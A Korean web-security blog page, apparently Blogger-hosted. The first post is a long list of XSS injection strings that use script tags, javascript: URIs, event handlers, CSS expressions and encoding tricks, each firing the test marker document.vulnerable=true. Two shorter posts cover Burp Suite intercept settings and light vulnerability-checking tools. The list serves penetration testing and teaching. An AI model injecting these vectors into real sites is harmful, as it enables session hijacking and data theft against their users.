2018. 5. 9.

XSS 공격 문자열

XSS 문자열은 다음과 같다
<meta http-equiv="refresh" content="0;url=javascript:document.vulnerable=true;">
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>
<SCRIPT>document.Vulnerable=true;</script>
<IMG SRC="jav ascript.document.vulerable=true;">
<IMG SRC="javascript:document.vulerable=true;">
<IMG SRC=" &#14;javascript:document.vulnerable=true;">
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=document.vulnerable=true;>
<<SCRIPT>document.vulnerable=true;//<</SCRIPT>
<SCRIPT <B>document.vulnerable=true;</SCRIPT>
<IMG SRC="javascript:document.vulnerable=true;"
<iframe src="javascript:document.vulnerable=true; <
<SCRIPT>a=/XSS/\ndocument.vulnerable=true;</SCRIPT>
\";document.vulnerable=true;;//
</TITLE><SCRIPT>document.vulnerable=true;</SCRIPT>
<INPUT TYPE="IMAGE" SRC="javascript:document.vulnerable=true;">
<BODY BACKGROUND="javascript:document.vulnerable=true;">
<BODY ONLOAD=document.vulnerable=true;>
<IMG DYNSRC="javascript:document.vulnerable=true;">
<IMG LOWSRC="javascript:document.vulnerable=true;">
<BGSOUND SRC="javascript:document.vulnerable=true;">
<BR SIZE="&{document.vulnerable=true}">
<LAYER SRC="javascript:document.vulnerable=true;"></LAYER>
<LINK REL="stylesheet" HREF="javascript:document.vulnerable=true;">
<STYLE>li {list-style-image: url("javascript:document.vulnerable=true;");</STYLE><UL><LI>XSS
¼script¾document.vulnerable=true;¼/script¾
<IFRAME SRC="javascript:document.vulnerable=true;"></IFRAME>
<FRAMESET><FRAME SRC="javascript:document.vulnerable=true;"></FRAMESET>
<TABLE BACKGROUND="javascript:document.vulnerable=true;">
<TABLE><TD BACKGROUND="javascript:document.vulnerable=true;">
<DIV STYLE="background-image: url(javascript:document.vulnerable=true;)">
<DIV STYLE="background-image: url(&#1;javascript:document.vulnerable=true;)">
<DIV STYLE="width: expression(document.vulnerable=true);">
<STYLE>@im\port'\ja\vasc\ript:document.vulnerable=true';</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(document.vulnerable=true)">
<XSS STYLE="xss:expression(document.vulnerable=true)">
exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(document.vulnerable=true)'>
<STYLE TYPE="text/javascript">document.vulnerable=true;</STYLE>
<STYLE>.XSS{background-image:url("javascript:document.vulnerable=true");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:document.vulnerable=true")}</STYLE>
<!--[if gte IE 4]><SCRIPT>document.vulnerable=true;</SCRIPT><![endif]-->
<BASE HREF="javascript:document.vulnerable=true;//">
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.vulnerable=true></OBJECT>
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:document.vulnerable=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:document.vulnerable=true"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>document.vulnerable=true</SCRIPT>"></BODY></HTML>
<? echo('<SCR)';echo('IPT>document.vulnerable=true</SCRIPT>'); ?>
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4-
<a href="javascript#document.vulnerable=true;">
<div onmouseover="document.vulnerable=true;">
<img src="javascript:document.vulnerable=true;">
<img dynsrc="javascript:document.vulnerable=true;">
<input type="image" dynsrc="javascript:document.vulnerable=true;">
<bgsound src="javascript:document.vulnerable=true;">
&<script>document.vulnerable=true;</script>
&{document.vulnerable=true;};
<img src=&{document.vulnerable=true;};>
<link rel="stylesheet" href="javascript:document.vulnerable=true;">
<img src="mocha:document.vulnerable=true;">
<img src="livescript:document.vulnerable=true;">
<a href="about:<script>document.vulnerable=true;</script>">
<body onload="document.vulnerable=true;">
<div style="background-image: url(javascript:document.vulnerable=true;);">
<div style="behaviour: url([link to code]);">
<div style="binding: url([link to code]);">
<div style="width: expression(document.vulnerable=true;);">
<style type="text/javascript">document.vulnerable=true;</style>
<object classid="clsid:..." codebase="javascript:document.vulnerable=true;">
<style><!--</style><script>document.vulnerable=true;//--></script>
<<script>document.vulnerable=true;</script>
<![CDATA[<!--]]<script>document.vulnerable=true;//--></script>
<!-- -- --><script>document.vulnerable=true;</script><!-- -- -->
<img src="blah"onmouseover="document.vulnerable=true;">
<img src="blah>" onmouseover="document.vulnerable=true;">
<xml src="javascript:document.vulnerable=true;">
<xml id="X"><a><b><script>document.vulnerable=true;</script>;</b></a></xml>
<div datafld="b" dataformatas="html" datasrc="#X"></div>
[\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script>

Continue reading

2018. 5. 3.

[웹 취약점] 버프스위트로 웹 취약점 분석 할 때, 설정 주의

버프스위트로 웹 취약점을 분석할 때, Request 패킷과 Response 패킷을 모두 분석 할 것이다. 그러기 위해서는 버프스위트 디폴스 설정 변경이 필요하다.

1. Proxy - Intercept Client Request
Intercept Server Responses 의 intercept responses based on the following rules 기능을 활성화 할것이다. 그런데 이를 체크한다고 해서 모든 Response 패킷이 잡히는것은 아니다.
기본적으로

아래와 같이 되어 있으면 gif, jpg, png, css, js, ico 등은 인터셉트 되지 않는다. js 등을 변조하기 위해서는 캡쳐가 되어야 하니 disable 해야한다.


2. Proxy - Intercept Client Responses

선택이 되어 있으면 파일 헤더 타입이 텍스트인 경우만 잡기 때문에 역시 disable 해야한다.

Continue reading

[웹취약점] 쉽고 가벼운 웹 취약점 점검 툴

1. smsniff 
송수신되는 중요 정보 암호화 확인을 위해 보통 wireshark 를 사용하는데, 이를 대체할 만한 툴이다. 암호화 통신을 확인하기에는 최적인 툴, 사용법이 쉽고 매우 간단함

2. acrodiff
파일 비교 프로그램이다. 웹 취약점 점검때에는 정상 응답값고 변조 후 응답값을 비교하는데 쓰인다. 바뀐 부분에 '하이라이트'로 강조됨으로써 한눈에 차이점을 확인 할 수 있다.


Continue reading

Popular Posts

Recent Posts

Powered by Blogger.